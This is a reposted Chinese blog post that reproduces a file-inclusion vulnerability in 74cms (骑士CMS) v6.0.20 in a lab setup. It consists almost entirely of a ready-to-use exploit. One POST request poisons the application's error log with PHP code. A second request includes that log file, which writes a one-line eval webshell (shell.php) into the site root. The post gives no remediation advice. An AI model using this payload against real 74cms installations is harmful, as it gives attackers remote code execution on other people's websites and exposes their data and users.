标签：文件 v6.0 20 包含 74cms Setup 漏洞 Home php

文件包含漏洞

实例

骑士CMS文件包含漏洞

下载地址：http://www.74cms.com/download/index.html

注意：

• 骑士cms不支持php7.x，复现php环境为php5.x即可
• 版本低于6.0.48

模版写入文件

http://10.211.55.9/74cms_Home_Setup_v6.0.20/index.php?m=home&a=assign_resume_tpl

POST:
variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

日志错误路径：

C:\phpstudy\WWW\74cms_Home_Setup_v6.0.20\data\Runtime\Logs\Home

开始包含：

http://10.211.55.9/74cms_Home_Setup_v6.0.20/index.php?m=home&a=assign_resume_tpl

POST:
variable=1&tpl=data/Runtime/Logs/Home/21_01_20.log

在根目录下写入shell.php文件，内容为一句话木马，包含成功

C:\phpstudy\WWW\74cms_Home_Setup_v6.0.20\shell.php

http://10.211.55.9/74cms_Home_Setup_v6.0.20/shell.php

标签：文件,v6.0,20,包含,74cms,Setup,漏洞,Home,php
来源： https://blog.csdn.net/sinat_30599967/article/details/113796943

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。